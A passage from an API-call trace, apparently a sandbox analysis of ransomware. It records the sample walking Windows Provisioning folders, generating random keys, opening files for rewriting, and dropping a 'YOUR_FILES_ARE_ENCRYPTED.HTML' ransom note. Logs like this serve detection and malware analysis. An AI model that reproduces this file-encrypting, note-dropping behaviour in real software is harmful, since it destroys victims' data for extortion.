(lpString=".provxml") returned 8 [0110.074] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.074] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed6d713, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed6d713, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed724d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f491c, dwReserved1=0x6f4868, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.074] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed6d713, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed6d713, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed724d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f491c, dwReserved1=0x6f4868, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.074] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.075] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.075] GetProcessHeap () returned 0x600000 [0110.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.075] GetProcessHeap () returned 0x600000 [0110.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.075] GetProcessHeap () returned 0x600000 [0110.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.076] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.076] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.076] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml") returned 101 [0110.076] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.076] lstrlenW (lpString=".xml") returned 4 [0110.076] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.076] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.076] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=348) returned 1 [0110.076] CloseHandle (hObject=0x32c) returned 1 [0110.076] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed774d1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed774d1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed7ada2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.076] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed774d1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed774d1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed7ada2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.076] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.077] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.077] GetProcessHeap () returned 0x600000 [0110.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.077] GetProcessHeap () returned 0x600000 [0110.077] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.077] GetProcessHeap () returned 0x600000 [0110.077] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.078] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed7e84d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed7e84d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed80f31, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.078] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed7e84d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed7e84d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed80f31, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.078] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.078] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.078] GetProcessHeap () returned 0x600000 [0110.078] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.079] GetProcessHeap () returned 0x600000 [0110.079] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.079] GetProcessHeap () returned 0x600000 [0110.079] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.079] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaedca3f9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedca3f9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", cAlternateFileName="{9AEC5~1")) returned 1 [0110.080] StrStrIW (lpFirst="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.080] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned 84 [0110.080] GetProcessHeap () returned 0x600000 [0110.080] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.081] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" [0110.081] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*" [0110.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaedca3f9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedca3f9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.081] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaedca3f9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedca3f9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.081] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c88c62, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1c88c62, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaedce958, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1cac, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B", cAlternateFileName="CUSTOM~1.747")) returned 1 [0110.081] StrStrIW (lpFirst="customizations.xml.74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.081] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B") returned 168 [0110.081] PathFindExtensionW (pszPath="customizations.xml.74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B") returned=".74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B" [0110.081] lstrlenW (lpString=".74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B") returned 65 [0110.081] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a2656d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a2656d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.081] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.081] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml") returned 104 [0110.081] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.081] lstrlenW (lpString=".xml") returned 4 [0110.081] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.081] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.081] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.082] CloseHandle (hObject=0x30c) returned 1 [0110.082] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.082] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.082] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned 89 [0110.082] GetProcessHeap () returned 0x600000 [0110.082] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.083] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" [0110.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*" [0110.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaedaa8eb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.083] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaedaa8eb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.083] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.083] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.083] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned 97 [0110.083] GetProcessHeap () returned 0x600000 [0110.083] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.084] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime" [0110.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*" [0110.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed9f845, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.084] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed9f845, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="..", cAlternateFileName="")) returned 1 [0110.085] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.085] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.085] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.085] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.085] lstrlenW (lpString=".provxml") returned 8 [0110.085] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.085] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed9f845, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed9f845, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeda338b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.085] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed9f845, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaed9f845, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeda338b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.085] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.085] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.085] GetProcessHeap () returned 0x600000 [0110.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.085] GetProcessHeap () returned 0x600000 [0110.085] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.085] GetProcessHeap () returned 0x600000 [0110.085] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.086] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, 